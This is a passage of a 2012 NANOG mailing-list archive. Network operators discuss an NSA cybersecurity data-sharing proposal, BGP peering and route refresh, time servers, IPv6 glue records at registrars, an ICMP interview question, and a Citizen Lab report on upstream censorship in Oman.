help there, either. Unless they expect retaliation? >> >> === >> >> http://in.reuters.com/article/2012/07/10/net-us-usa-security-cyber-idINBRE86901620120710 >> >> U.S. spy agencies say won't read Americans' email for cybersecurity >> 8:48pm EDT >> >> By Tabassum Zakaria and David Alexander >> >> WASHINGTON (Reuters) - The head of the U.S. spy agency that eavesdrops on >> electronic communications overseas sought on Monday to reassure Americans >> that the National Security Agency would not read their personal email if >> a new cybersecurity law was enacted to allow private companies to share >> information with the government. >> ... >> >> But to help protect the private sector, he said it was important that the >> intelligence agency be able to inform them about the type of malicious > > translated: "Hey, what if we could tell our private sector partners > (Lockheed-Martin, for instance) that they should be on the lookout for > things like X, or traffic destined to Y, or people sending all their > DNS queries to these 5 netblocks." (dcwg.org sorta crap) > > that doesn't sound 'bad', it sounds like there is a gap in the > business world to wrap all this data up and sell access to it... but > the gov't can jump in with their mountains of data from their > 'einstein' or whatever and go to town protecting their 'partners' who > have often close interactions with the gov't, right? > >> software and other cyber intrusions it is seeing and hear from companies >> about what they see breaching the protective measures on their computer >> networks. > > adding to the above: "What if we had an API such that you could feed > your collected alarm/alert/badness data to us as well? and we could > feed that back into our system, protect ourselves AND send it back out > to the other partners?" > > again, that's not that bad, really it sounds pretty cool... only if > MCI could have found a way to productize and monetize that... which we > built for them too :( but I digress. > >> "It doesn't require the government to read their mail or your mail to do >> that. It requires them, the Internet service provider or that company, to >> tell us that that type of event is going on at this time. And it has to be >> at network speed if you're going to stop it," Alexander said. > > alexander is loose with his pronouns, which makes this worse... in > reality: "send your alarm data to our system, hurrah!", PROBABLY this > could include large ISP people if the pricing (or regulatory world > were right), these folks COULD of course limit that to 'business isp > traffic only', maybe. > > this sounds a little less on the ball though, so I'll blame bad > reporter-translation, and hope that Alexander really meant: "Our > partners in the industry, who help supply us and build our widgets for > us, would be enabled to send data into our API..." > >> >> He said the information the government was seeking was the Internet >> address where an email containing malicious software originated and >> where it traveled to, not the content of the email. > > I'm sure this was simply an example... and the reporter jumped on it > like a carnivore, poor job reporter! :( > >> ... >> >> But the U.S. government is also concerned about the possibility of a cyber >> attack from adversaries on critical infrastructure such as the power grid or >> transportation systems. > > yes, put in the boogie-man! also, keep in mind that CI things are ... > in a horrid state, and as it turns out the folk running it are > ostriches :( > > -chris From morrowc.lists at gmail.com Tue Jul 10 15:48:46 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Tue, 10 Jul 2012 16:48:46 -0400 Subject: Admin? Bueller? In-Reply-To: References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> <20120710114123.6265101e@segv> Message-ID: On Tue, Jul 10, 2012 at 1:39 PM, shawn wilson wrote: > On Tue, Jul 10, 2012 at 1:22 PM, Christopher Morrow > wrote: > >> the admins of the nanog-list could certainly take action though. >> > > the reason for my email is that it was the second ot type email in a > week and i was hoping someone could clarify what the moderators will > and won't do. oh sure, the admins can/should find an answer to this... since it's annoying. > i don't think an isp should block an email of this type - it doesn't > appear the account has been compromised at this point. the email is ot > to the list, not a compromise to the sender or isp. From nanog at armorfirewall.com Tue Jul 10 17:22:47 2012 From: nanog at armorfirewall.com (George - AD7RL) Date: Tue, 10 Jul 2012 15:22:47 -0700 (MST) Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: References: <4FFB898B.2000908@gmail.com> Message-ID: To be fair, we really should listen to what he had to say; http://www.c-span.org/Events/Director-of-NSA-Outlines-New-Threats-to-Security-and-Economy/10737432170-1/ The introduction by Wolfowitz doesn't really help the credibility, but the master of FUD knows you have to build a foundation of truth in order to layer on the FUD. Alexander's technical discussion is pretty good. He seems to at least know the basics of the issues he addresses. It's his conclusions I have trouble with. First and foremost, he proposes addressing the problem of insecure systems by layering on another system. This approach hasn't worked yet, and is even less likely to work in the future. If they build this system, can they keep malicious hackers out? Chinese? Russians? If they can build this system securely, why not just go without it, and rebuild the existing systems securely? While they may only be interested in data streams, and not email content, as he said: How will you build it with the capability of examining binary attachments or links, but not email content? By nature, this system would have the capability of reading our mail, even if that's not the stated purpose. How long until mission creep starts looking for keywords? Then there's issues of concern mainly to technical people. Many on this list have the capability of doing some really bad stuff to the network. Would it be justifiable to watch these people a little more closely than the general public? The public might not mind (yet), but should all of our discussions (i.e., intellectual property) be automatically forfeited to the government? Both signed and proposed legislation have opened the door to "greater cooperation between the military and homeland security". Should this capability of the military be available to DHS to hunt out "subversives"? Can they guarantee that there will be no mission creep? No searching (or archiving) of email contents? And most of all, can they guarantee that it will never get pwned? Cheers, G_ From aj at jonesy.com.au Tue Jul 10 21:44:39 2012 From: aj at jonesy.com.au (Andrew Jones) Date: Wed, 11 Jul 2012 12:44:39 +1000 Subject: Requesting off-list contact from a verizon.net mail admin Message-ID: <3ff9720c1f9e4d17e9110d48001a7253@localhost> If someone who looks after verizon.net mail is listening, I would appreciate them contacting me regarding some issues we are having getting email through from our IP range. We've tried all the usual email channels (no response), and the online form insists that reverse DNS is missing (it's not) or the address is dynamic (it's not). Thanks, Andrew Jones Daraco Services From jerome at ceriz.fr Wed Jul 11 03:37:02 2012 From: jerome at ceriz.fr (=?ISO-8859-1?Q?J=E9r=F4me_Nicolle?=) Date: Wed, 11 Jul 2012 10:37:02 +0200 Subject: strat-1 gps In-Reply-To: References: Message-ID: <4FFD3B2E.1050400@ceriz.fr> Le 26/06/2012 19:30, Randy Bush a ?crit : > my old TymServe 2100-GPS seems to have died. would appreciate reccos > for a replacement. it is in a stand-alone environment so i can avoid > roof access issues. antenna already in place. thanks. > > randy > If you're looking for somthing fancy, you may want to check out http://www.timeservers.eu/Products/Time-Server-NTS4000 Multiple sync source (GPS, Glonass, Gallileo, GSM, input for rubidium or cesium clocks, 1PPS straight input for analog radio sync), compact form factor, dual (up to 6) LAN port for redundancy... This device does it all :) several models and options are available, ranging from $3k to $8k AFAIK. -- J?r?me Nicolle +33 6 19 31 27 14 From luqman.kondeth at nyu.edu Wed Jul 11 07:47:55 2012 From: luqman.kondeth at nyu.edu (Luqman Kondeth) Date: Wed, 11 Jul 2012 16:47:55 +0400 Subject: LEVEL3, FLAG, NTT peering policies Message-ID: HI All, Apologies if this has been asked before, I was hoping to get a quick answer to rescue a situation J. We are advertising our prefixes to an ISP in the region who has level3, ntt & flag telecom as its upstream providers. I wanted to know if ntt & flag telecom have any BGP filtering policy based on AS or IP prefixes? I know level3 has such policies which are downloaded from the RIPE DB according to their published peering policy document. I?ve read through the peering policies of NTT & FLAG ( http://www.us.ntt.net/support/policy/routing.cfm , http://www.onesc.net/communities/as15412/ ) and donot see anything which would suggest they use the ripe db or any other db for filtering based on AS or IP prefixes. Infact, it doesn?t seem they have an inbound filter policy on IP prefixes or AS Could someone please confirm? Many thanks From jared at puck.nether.net Wed Jul 11 08:13:36 2012 From: jared at puck.nether.net (Jared Mauch) Date: Wed, 11 Jul 2012 09:13:36 -0400 Subject: LEVEL3, FLAG, NTT peering policies In-Reply-To: References: Message-ID: <69B22218-8376-4974-9054-532A273F039F@puck.nether.net> NTT uses a variety of routing registries. Please see http://www.us.ntt.net/support/policy/rr.cfm for information. - Jared On Jul 11, 2012, at 8:47 AM, Luqman Kondeth wrote: > HI All, > > Apologies if this has been asked before, I was hoping to get a quick answer > to rescue a situation J. > > We are advertising our prefixes to an ISP in the region who has level3, ntt > & flag telecom as its upstream providers. I wanted to know if ntt & flag > telecom have any BGP filtering policy based on AS or IP prefixes? > > I know level3 has such policies which are downloaded from the RIPE DB > according to their published peering policy document. > > I?ve read through the peering policies of NTT & FLAG ( > http://www.us.ntt.net/support/policy/routing.cfm , > http://www.onesc.net/communities/as15412/ ) and donot see anything which > would suggest they use the ripe db or any other db for filtering based on > AS or IP prefixes. Infact, it doesn?t seem they have an inbound filter > policy on IP prefixes or AS > > > > Could someone please confirm? > > > > Many thanks From jerry at jdixon.com Wed Jul 11 09:08:01 2012 From: jerry at jdixon.com (Jerry Dixon) Date: Wed, 11 Jul 2012 10:08:01 -0400 Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: References: <4FFB898B.2000908@gmail.com> Message-ID: It's more of a strategy to centralize protection efforts versus using a de-centralized approach. I want go into the scalability issues and also "scope" creep aspects however, as Chris points out, it would be far better to share indications & warnings with organizations that can leverage their own security infrastructure to protect themselves. Organizations have different risk management profiles meaning they know what is important to protect to sustain their business and will make decisions based off of that. You can share this information automated style depending on your level of trust of what is being provided so things can move at the speed of light so to speak however this is still, yet another, reactive approach. We all know the issues of signature based systems. However, their intent is good and all about protecting the country. The approach can be debated though :) Jerry On Mon, Jul 9, 2012 at 11:22 PM, Christopher Morrow wrote: > (note, people ought to: 1) think about this on their own making up > their own minds, 2) understand that the press has some very weird > ideas, 3) take some better protections on their own, for their own > security) > > also, I'm not judging the OP nor the reporter nor the ideas espoused > in the article/clips... > > On Mon, Jul 9, 2012 at 9:46 PM, William Allen Simpson > wrote: > > Somebody needs to give them a clue-by-four. The private sector > > people keep trying, sometimes it's helped. sometimes reporters need to > sell stories :( > > > already has the "Internet address where an email ... originated"; > > it's not just email they care about :( (you knew that I think) > > > it's already in the Received lines. We don't need to be informed > > about it, we already inform each other about it. > > one interesting idea, that has proven out some merit over the years is > the ability to share 'incident' data across entry points (say across > companies, or gov'ts even) about 'bad things' that are happening. > > Take the case of 'spam came in from this end system to my mailserver', > if I tell you that (or some central system that which you can query) > you'll learn that maybe the inbound connection to you is also > spam-rich. > > > And it's already delivered "at network speed." > > > > the article sort of reads like the above scenario though... maybe it's > NOT that, maybe it's something else entirely... it SEEMS that the > gov't wants to help. They may be able to, they may just foul things > up. The reporter certainly didn't leave enough details in place to > tell :( > > > It is my understanding the Dept of Homeland Security already > > cooperates in sharing government intrusion information. We certainly > > don't need a "U.S. spy agency" MITM to "protect the private sector." > > > > you may mean? could be... the wikipedias are sometimes wrong, or so > says the teacher of my 7yr old. > > > Moreover, the US is the source of most spam and malware, so the NSA > > isn't really going to be much help. And the US is the source of the > > but hosts in the US that are botted/spamming, also spam/bot other > things outside the US, right? so really who cares where the src is, > get some data collection points up and use that data to inform your > security policy, no? (sure, you'll have to have some smarts, and some > smart people, and be cautious... but you'd do that anyway, right? :) ) > > These folks have some awesome tech for that sort of data collection > and analysis: > > > it's a shame that their parent company can't find a way to monetize > that sort of thing. (the article there talks about some older version > of the system, which is still alive/well today doing fraud detection > and was doing some IDS/anomaly-detection-like work as well for ip > network things) > > > only known cyber attacks on other country's infrastructure, so it's > > not likely much help there, either. Unless they expect retaliation? > > > > === > > > > > http://in.reuters.com/article/2012/07/10/net-us-usa-security-cyber-idINBRE86901620120710 > > > > U.S. spy agencies say won't read Americans' email for cybersecurity > > 8:48pm EDT > > > > By Tabassum Zakaria and David Alexander > > > > WASHINGTON (Reuters) - The head of the U.S. spy agency that eavesdrops on > > electronic communications overseas sought on Monday to reassure Americans > > that the National Security Agency would not read their personal email if > > a new cybersecurity law was enacted to allow private companies to share > > information with the government. > > ... > > > > But to help protect the private sector, he said it was important that the > > intelligence agency be able to inform them about the type of malicious > > translated: "Hey, what if we could tell our private sector partners > (Lockheed-Martin, for instance) that they should be on the lookout for > things like X, or traffic destined to Y, or people sending all their > DNS queries to these 5 netblocks." (dcwg.org sorta crap) > > that doesn't sound 'bad', it sounds like there is a gap in the > business world to wrap all this data up and sell access to it... but > the gov't can jump in with their mountains of data from their > 'einstein' or whatever and go to town protecting their 'partners' who > have often close interactions with the gov't, right? > > > software and other cyber intrusions it is seeing and hear from companies > > about what they see breaching the protective measures on their computer > > networks. > > adding to the above: "What if we had an API such that you could feed > your collected alarm/alert/badness data to us as well? and we could > feed that back into our system, protect ourselves AND send it back out > to the other partners?" > > again, that's not that bad, really it sounds pretty cool... only if > MCI could have found a way to productize and monetize that... which we > built for them too :( but I digress. > > > "It doesn't require the government to read their mail or your mail to do > > that. It requires them, the Internet service provider or that company, to > > tell us that that type of event is going on at this time. And it has to > be > > at network speed if you're going to stop it," Alexander said. > > alexander is loose with his pronouns, which makes this worse... in > reality: "send your alarm data to our system, hurrah!", PROBABLY this > could include large ISP people if the pricing (or regulatory world > were right), these folks COULD of course limit that to 'business isp > traffic only', maybe. > > this sounds a little less on the ball though, so I'll blame bad > reporter-translation, and hope that Alexander really meant: "Our > partners in the industry, who help supply us and build our widgets for > us, would be enabled to send data into our API..." > > > > > He said the information the government was seeking was the Internet > > address where an email containing malicious software originated and > > where it traveled to, not the content of the email. > > I'm sure this was simply an example... and the reporter jumped on it > like a carnivore, poor job reporter! :( > > > ... > > > > But the U.S. government is also concerned about the possibility of a > cyber > > attack from adversaries on critical infrastructure such as the power > grid or > > transportation systems. > > yes, put in the boogie-man! also, keep in mind that CI things are ... > in a horrid state, and as it turns out the folk running it are > ostriches :( > > -chris > > -- Jerry jerry at jdixon.com From jmaimon at ttec.com Wed Jul 11 09:56:33 2012 From: jmaimon at ttec.com (Joe Maimon) Date: Wed, 11 Jul 2012 10:56:33 -0400 Subject: [c-nsp] automatic bgp route refresh In-Reply-To: <4F43B36D.7070405@ttec.com> References: <4F43B36D.7070405@ttec.com> Message-ID: <4FFD9421.5030606@ttec.com> Joe Maimon wrote: > Hey All, > > I would greatly appreciate it if somebody would point me to the release > notes for the change I see in 15.1 where BGP neighbor route-map > configurations happen in real time, without needing any clearing, soft > or otherwise. > > Much obliged. > > Best, > > Joe So I opened the TAC case, went through the repro multiple times, documented it, webexed it, discussed it. First I am told that there is an undocumented command to turn it off. " The feature we are talking about is route refresh capability this is a bgp hidden command which will not negotiate this capability and you will have to manually refresh routes after making any configuration changes. neighbor x.x.x.x dont-capability-negotiate enhanced-refresh " Which does not work. Then I am told that all IOS have been updated to do this and that there are no publicly available release notes for this change and if I want any further help, I need to have my account manager convince them that I am worthy. Which seems to be the way they try to resolve all cases these days. Cisco support has sunk to new levels. You end up paying them to sadistically torture and tantalize you. Which I am not into. I remember when they would actually file a bug when you found one (with a mtrr +-2yrs). Best, Joe From steve at pirk.com Wed Jul 11 12:00:41 2012 From: steve at pirk.com (steve pirk [egrep]) Date: Wed, 11 Jul 2012 10:00:41 -0700 Subject: FYI Netflix is down In-Reply-To: References: Message-ID: On Mon, Jul 9, 2012 at 10:20 AM, Dave Hart wrote: > "We continue to investigate why these connections were timing out > during connect, rather than quickly determining that there was no > route to the unavailable hosts and failing quickly." > > potential translation: > > "We continue to shoot ourselves in the foot by filtering all ICMP > without understanding the implications." > > Sorry to mention my favorite hardware vendor again, but that is what I liked about using F5 BigIP as load balancing devices... They did layer 7 url checking to see if the service was really responding (instead of just pinging or opening a connection to the IP). We performed tests that would do a complete LDAP SSL query to verify a directory server could actually look up a person. If it failed to answer within a certain time frame, then it was taken out of rotation. I do not know if that was ever implemented in production, but we did verify it worked. On the "software in the hardware can fail" point, my only defense is you do redundant testing of the watcher devices, and have enough of them to vote misbehaving ones out of service. Oh, and it is best if the global load balancing hardware/software is located somewhere else besides the data centers being monitored. -- steve pirk From heather.schiller at verizon.com Wed Jul 11 12:04:06 2012 From: heather.schiller at verizon.com (Schiller, Heather A) Date: Wed, 11 Jul 2012 13:04:06 -0400 Subject: Requesting off-list contact from a verizon.net mail admin In-Reply-To: <3ff9720c1f9e4d17e9110d48001a7253@localhost> References: <3ff9720c1f9e4d17e9110d48001a7253@localhost> Message-ID: Replied off list.. --Heather -----Original Message----- From: Andrew Jones [mailto:aj at jonesy.com.au] Sent: Tuesday, July 10, 2012 10:45 PM To: nanog at nanog.org Subject: Requesting off-list contact from a verizon.net mail admin If someone who looks after verizon.net mail is listening, I would appreciate them contacting me regarding some issues we are having getting email through from our IP range. We've tried all the usual email channels (no response), and the online form insists that reverse DNS is missing (it's not) or the address is dynamic (it's not). Thanks, Andrew Jones Daraco Services From thegameiam at yahoo.com Wed Jul 11 13:32:29 2012 From: thegameiam at yahoo.com (David Barak) Date: Wed, 11 Jul 2012 11:32:29 -0700 (PDT) Subject: job screening question Message-ID: <1342031549.49362.YahooMailMobile@web31812.mail.mud.yahoo.com> (please excuse the top post) If you want a great analysis of how this happened before, check out Clanchy's book _From memory to written record_ about the implications of the spread of literacy as a technology in England in the 1300s. David Barak From jeroen at mompl.net Wed Jul 11 15:04:37 2012 From: jeroen at mompl.net (Jeroen van Aart) Date: Wed, 11 Jul 2012 13:04:37 -0700 Subject: Cisco Update In-Reply-To: <201207071430.q67EUDjx019523@aurora.sol.net> References: <201207071430.q67EUDjx019523@aurora.sol.net> Message-ID: <4FFDDC55.3080406@mompl.net> Joe Greco wrote: > No, really, how bad an idea can it be to have a central database and > a system that's allowed to remotely log in, configure, and update > thousands of Internet-connected CPE? I mean, talk about making an > attractive target. No argument against the lack of wisdom regarding this cisco thing, but... As a botnet operator in the business of making money (and thus relying on the availability of your botnets) why go through the bother of compromising such system and creating a botnet (which will be rather quickly fixed once the breach is noticed) when you can do it easily enough sending out a simple email with the proper binary code attached, relying on the PEBKAC paradigm. ;-) This method has been proven to be very effective, considering many 100s of millions of zombie computers exist. Greetings, Jeroen -- Earthquake Magnitude: 4.6 Date: Wednesday, July 11, 2012 10:54:36 UTC Location: near the east coast of Honshu, Japan Latitude: 35.9986; Longitude: 140.9388 Depth: 27.40 km From tyler.haske at gmail.com Wed Jul 11 15:21:23 2012 From: tyler.haske at gmail.com (Tyler Haske) Date: Wed, 11 Jul 2012 16:21:23 -0400 Subject: Cisco Update In-Reply-To: <4FFDDC55.3080406@mompl.net> References: <201207071430.q67EUDjx019523@aurora.sol.net> <4FFDDC55.3080406@mompl.net> Message-ID: 1+ billion zombie computers .... source please? > This method has been proven to be very effective, considering many 100s of millions of zombie computers exist. > > Greetings, > Jeroen From nanog at deman.com Wed Jul 11 23:42:01 2012 From: nanog at deman.com (Michael DeMan) Date: Wed, 11 Jul 2012 21:42:01 -0700 Subject: fiber cut in Portland OR / Vancouver WA area Message-ID: We have seen some spottyness with IP and cel phone connectivity in this area. It has been going on for several hours now. Thanks, - mike From nanog at deman.com Thu Jul 12 00:06:40 2012 From: nanog at deman.com (Michael DeMan) Date: Wed, 11 Jul 2012 22:06:40 -0700 Subject: fiber cut in Portland OR / Vancouver WA area In-Reply-To: References: Message-ID: <66211F9E-6A19-4465-B64E-49DAF6A5B935@deman.com> AT&T said they have been doing maintenance, I called in about the cel service issues only. They have an ETA of about 2-3 days for completion of work, which should not drop service but will impact services. I would guess for 4G upgrades or something and inability/poor-planning on the upgrades. - mike Duh - area is Vancouver WA area On Jul 11, 2012, at 9:42 PM, Michael DeMan wrote: > We have seen some spottyness with IP and cel phone connectivity in this area. It has been going on for several hours now. > > Thanks, > - mike > From daodennis at gmail.com Thu Jul 12 13:19:18 2012 From: daodennis at gmail.com (Dennis) Date: Thu, 12 Jul 2012 11:19:18 -0700 Subject: job screening question In-Reply-To: References: Message-ID: On Thu, Jul 5, 2012 at 10:02 AM, William Herrin wrote: > Hi folks, > > I gave my HR folks a screening question to ask candidates for an IP > expert position. I've gotten some "unexpected" answers, so I want to > do a sanity check and make sure I'm not asking something unreasonable. > And by "unexpected" I don't mean naively incorrect answers, I mean > oh-my-God-how-did-you-get-that-cisco-certification answers. > > The question was: > > You implement a firewall on which you block all ICMP packets. What > part of the TCP protocol (not IP in general, TCP specifically) > malfunctions as a result? > > > My questions for you are: > > 1. As an expert who follows NANOG, do you know the answer? Or is this > question too hard? > I perused the thread but lots of people have mentioned mtu discovery but not what happens on TCP and an issue with mss but not what happens - if there is a smaller mtu along the path the receive window fills up on the host initiating the connection and then the connection just times out. > > 2. Is the question too vague? Is there a clearer way to word it? > It is way to confusing and may be better in a two part question and work up to it. Instead of asking if all ICMP is blocked put into to Type/Code with out giving away that it's the Maybe for HR ask more text book stuff like name the tcp flags or describe the tcp connection closing or what field determines if a packet can be fragmented and then compare that to how it works in IPv6. How big is the TCP or IP headers? How many with options? etc... > > 3. Is there a better screening question I could pass to HR to ask and > check the candidate's response against the supplied answer? > > Thanks, > Bill Herrin > > > -- > William D. Herrin ................ herrin at dirtside.com bill at herrin.us > 3005 Crane Dr. ...................... Web: > Falls Church, VA 22042-3004 > > From rguerra at privaterra.org Thu Jul 12 17:21:32 2012 From: rguerra at privaterra.org (Robert Guerra) Date: Thu, 12 Jul 2012 18:21:32 -0400 Subject: Routing Gone Wild: Documenting upstream filtering in Oman via India Message-ID: I know this is outside the NANOG area. Posting here as it might be of interest. Ron and I welcome any comments folks on the list might have on the report. --- New Citizen Lab / ONI cross-posted blog report: Routing Gone Wild: Documenting upstream filtering in Oman via India Key Findings ? Data collected from Oman shows that web filtering applied by India-based ISPs is restricting access to content for customers of an ISP in Oman. While unusual, content filtering undertaken in one political jurisdiction can have an effect on users in another political jurisdiction as a result of ISP routing arrangements ? a phenomenon known as ?upstream filtering.? ? Content found to be filtered includes news sites, political blogs and file sharing sites. ? Some variability in filtering was documented, potentially linked to certain measures to loosen filtering regulations in India. https://citizenlab.org/2012/07/routing-gone-wild/ Ronald Deibert Director, the Citizen Lab and the Canada Centre for Global Security Studies Munk School of Global Affairs University of Toronto (416) 946-8916 PGP: http://deibert.citizenlab.org/pubkey.txt http://deibert.citizenlab.org/ twitter.com/citizenlab r.deibert at utoronto.ca From kemp at network-services.uoregon.edu Fri Jul 13 02:35:53 2012 From: kemp at network-services.uoregon.edu (John Kemp) Date: Fri, 13 Jul 2012 00:35:53 -0700 Subject: HELP IN SETTING UP iBGPlay In-Reply-To: References: Message-ID: <4FFFCFD9.9010103@network-services.uoregon.edu> On 7/10/2012 5:04 AM, Joseph M. Owino wrote: > hi, > > Anyone out there who can help in setting up iBGP looking glass for an IXP. We currently are running 2 route servers and and 2 switches, they all are Cisco equipment. We also have a working web server running on FreeBSD 8.0. Any help is highly appreciated. > > regards, > Muga > Happy to help you if you get stuck. The work flow looks very similar to what is in BGPlay, so once you have the MRT file that contains desired data, you are most of the way there. I suspect the issue you will hit is that you already have existing route servers, and when you specify the route servers as the source route-reflector-clients, then you will see the route servers as the "routers" in your views rather than your peer routers. If on the other hand you have control over your peer routers, and you can reflect directly to the iBGPlay routerserver, that appears to be the model they show in their setup documents. John Kemp (kemp at routeviews.org) From brandon at burn.net Fri Jul 13 07:43:03 2012 From: brandon at burn.net (Brandon Applegate) Date: Fri, 13 Jul 2012 08:43:03 -0400 (EDT) Subject: Netsol AAAA glue Message-ID: So I sent an email over a week ago to ipv6req at networksolutions.com - and since I've only recieved the auto reply. A year or so ago I did this and got very quick turnaround, but now just dead air (sent another email yesterday). Wanted to see if others had the same results (recently) and any advice before I call into phone tree hell. Thanks. -- Brandon Applegate - CCIE 10273 PGP Key fingerprint: 8779 B023 7637 CEC8 C5C6 4052 664D 7E08 3CBB 1739 "SH1-0151. This is the serial number, of our orbital gun." From jared at puck.nether.net Fri Jul 13 07:52:27 2012 From: jared at puck.nether.net (Jared Mauch) Date: Fri, 13 Jul 2012 08:52:27 -0400 Subject: Netsol AAAA glue In-Reply-To: References: Message-ID: On Jul 13, 2012, at 8:43 AM, Brandon Applegate wrote: > So I sent an email over a week ago to ipv6req at networksolutions.com - and since I've only recieved the auto reply. > > A year or so ago I did this and got very quick turnaround, but now just dead air (sent another email yesterday). > > Wanted to see if others had the same results (recently) and any advice before I call into phone tree hell. Thanks. As long as you're not 1 year into a 10 year renewal, you may want to consider just moving your domains to another registrar such as opensrs. Drawback of using OpenSRS is they don't do DS records for dnssec, if that's a requirement as well, I believe Dyn has a good service for this (or so I read in the OpenSRS forums). - Jared From jeroen at unfix.org Fri Jul 13 07:55:18 2012 From: jeroen at unfix.org (Jeroen Massar) Date: Fri, 13 Jul 2012 14:55:18 +0200 Subject: Netsol AAAA glue In-Reply-To: References: Message-ID: <50001AB6.3040604@unfix.org> On 2012-07-13 14:52 , Jared Mauch wrote: > > On Jul 13, 2012, at 8:43 AM, Brandon Applegate wrote: > >> So I sent an email over a week ago to ipv6req at networksolutions.com >> - and since I've only recieved the auto reply. >> >> A year or so ago I did this and got very quick turnaround, but now >> just dead air (sent another email yesterday). >> >> Wanted to see if others had the same results (recently) and any >> advice before I call into phone tree hell. Thanks. > > As long as you're not 1 year into a 10 year renewal, you may want to > consider just moving your domains to another registrar such as > opensrs. Drawback of using OpenSRS is they don't do DS records for > dnssec, if that's a requirement as well, I believe Dyn has a good > service for this (or so I read in the OpenSRS forums). Joker is a good one for that (IPv6 glue + DNSSEC) too, especially because of their automated robot that one can easily push key updates to. Obligatory link containing further options: http://www.sixxs.net/faq/dns/?faq=ipv6glue Greets, Jeroen From cb.list6 at gmail.com Fri Jul 13 08:00:57 2012 From: cb.list6 at gmail.com (Cameron Byrne) Date: Fri, 13 Jul 2012 06:00:57 -0700 Subject: Netsol AAAA glue In-Reply-To: References: Message-ID: On Fri, Jul 13, 2012 at 5:43 AM, Brandon Applegate wrote: > So I sent an email over a week ago to ipv6req at networksolutions.com - and > since I've only recieved the auto reply. > > A year or so ago I did this and got very quick turnaround, but now just dead > air (sent another email yesterday). > > Wanted to see if others had the same results (recently) and any advice > before I call into phone tree hell. Thanks. > NetSol has been dragged through the mud on NANOG a few times in recent memory, i believe the best bet is to 1) review the archives 2) find another register from 2008 http://www.nanog.org/mailinglist/mailarchives/old_archive/2008-07/msg00542.html from a few months ago http://seclists.org/nanog/2012/Mar/1001 CB From asullivan at dyn.com Fri Jul 13 08:07:17 2012 From: asullivan at dyn.com (Andrew Sullivan) Date: Fri, 13 Jul 2012 09:07:17 -0400 Subject: Netsol AAAA glue In-Reply-To: References: Message-ID: <20120713130717.GB93613@dyn.com> On Fri, Jul 13, 2012 at 08:52:27AM -0400, Jared Mauch wrote: > dnssec, if that's a requirement as well, I believe Dyn has a good > service for this (or so I read in the OpenSRS forums). Yes, Dyn supports DNSSEC and will send the DS to the registrar and so on. We'll also host the DNS using DNSSEC for you, but it's not a requirement to use our service for this. (I'm delighted to hear that people say it's good.) Best, A -- Andrew Sullivan Dyn Labs asullivan at dyn.com From jacques at siberia.co.za Fri Jul 13 08:13:51 2012 From: jacques at siberia.co.za (Jacques Marneweck) Date: Fri, 13 Jul 2012 15:13:51 +0200 Subject: Netsol AAAA glue In-Reply-To: References: Message-ID: <50001F0F.8010005@siberia.co.za> Hi Brandon, Check out Name Cheap. One has to submit a support ticket for them to contact enom to add the ipv6 bits but that takes less than 2 days to have in place. Regards --jm > Brandon Applegate > 13 July 2012 2:43 PM > So I sent an email over a week ago to ipv6req at networksolutions.com - > and since I've only recieved the auto reply. > > A year or so ago I did this and got very quick turnaround, but now > just dead air (sent another email yesterday). > > Wanted to see if others had the same results (recently) and any advice > before I call into phone tree hell. Thanks. > > -- > Brandon Applegate - CCIE 10273 > PGP Key fingerprint: > 8779 B023 7637 CEC8 C5C6 4052 664D 7E08 3CBB 1739 > "SH1-0151. This is the serial number, of our orbital gun." > > From eugen at leitl.org Fri Jul 13 08:54:15 2012 From: eugen at leitl.org (Eugen Leitl) Date: Fri, 13 Jul 2012 15:54:15 +0200 Subject: [liberationtech] new opennet citizen lab report: routing gone wild Message-ID: <20120713135415.GP12615@leitl.org> ----- Forwarded message from Ronald Deibert ----- From: Ronald Deibert Date: Fri, 13 Jul 2012 09:45:29 -0400 To: Liberation Tech List Subject: [liberationtech] new opennet citizen lab report: routing gone wild X-Mailer: Apple Mail (2.1278) Routing Gone Wild: Documenting upstream filtering in Oman via India Key Findings ? Data collected from Oman shows that web filtering applied by India-based ISPs is restricting access to content for customers of an ISP in Oman. While unusual, content filtering undertaken in one political jurisdiction can have an effect on users in another political jurisdiction as a result of ISP routing arrangements ? a phenomenon known as ?upstream filtering.? ? Content found to be filtered includes news sites, political blogs and file sharing sites. ? Some variability in filtering was documented, potentially linked to certain measures to loosen filtering regulations in India. http://arstechnica.com/tech-policy/2012/07/internet-content-blocking-travels-downstream-affects-unwary-users/ https://citizenlab.org/2012/07/routing-gone-wild/ https://citizenlab.org/wp-content/uploads/2012/07/08-2012-routinggonewild.pdf http://opennet.net/blog/2012/07/routing-gone-wild-documenting-upstream-filtering-oman-india Please Note: Data Raw data for the proxy test results cited here can be found in the following formats: Summarized results [Google doc] Summarized results [csv] Raw data [zip - html, csv, txt] The data presented is from a June 18, 2012 test run of a URL list through two Omantel proxies, as well as from the Czech Republic as a control. There are three types of block pages that have been highlighted in the columns: oman_block_social - An Omani block page that specifies that the blocking was due to "societal and cultural norms of the sultanate." oman_block_laws - An Omani block page that specifies the reason for blocking was a violation of the law. india_block - An Indian block page that specifies the reason for blocking was a court order. The presented zip file contains the html contents and headers returned during the course of this test run. To view this data, extract the zip file and open the contained index.html. Please exercise caution when following any links in this file, as the file contains contents of website data returned and we can make no guarantee as to what these sites contain. This data is presented for informational purposes only and we make no claims regarding the ownership of website content. There were two redactions made in the data. The IP numbers of proxies used were obfuscated and the website contents of the site songdad.com were removed, due to the fact that during the time of testing this site contained the JS/Blacole exploit kit. Ronald J. Deibert Professor of Political Science Director, The Canada Centre for Global Security Studies and The Citizen Lab Munk School of Global Affairs University of Toronto r.deibert at utoronto.ca http://deibert.citizenlab.org/ twitter.com/citizenlab _______________________________________________ liberationtech mailing list liberationtech at lists.stanford.edu Should you need to change your subscription options, please go to: https://mailman.stanford.edu/mailman/listinfo/liberationtech If you would like to receive a daily digest, click "yes" (once you click above) next to "would you like to receive list mail batched in a daily digest?" You will need the user name and password you receive from the list moderator in monthly reminders. You may ask for a reminder here: https://mailman.stanford.edu/mailman/listinfo/liberationtech Should you need immediate assistance, please contact the list moderator. Please don't forget to follow us on http://twitter.com/#!/Liberationtech ----- End forwarded message ----- -- Eugen* Leitl leitl http://leitl.org ______________________________________________________________ ICBM: 48.07100, 11.36820 http://www.ativel.com http://postbiota.org 8B29F6BE: 099D 78BA 2FD3 B014 B08A 7779 75B0 2443 8B29 F6BE From bhmccie at gmail.com Fri Jul 13 09:38:28 2012 From: bhmccie at gmail.com 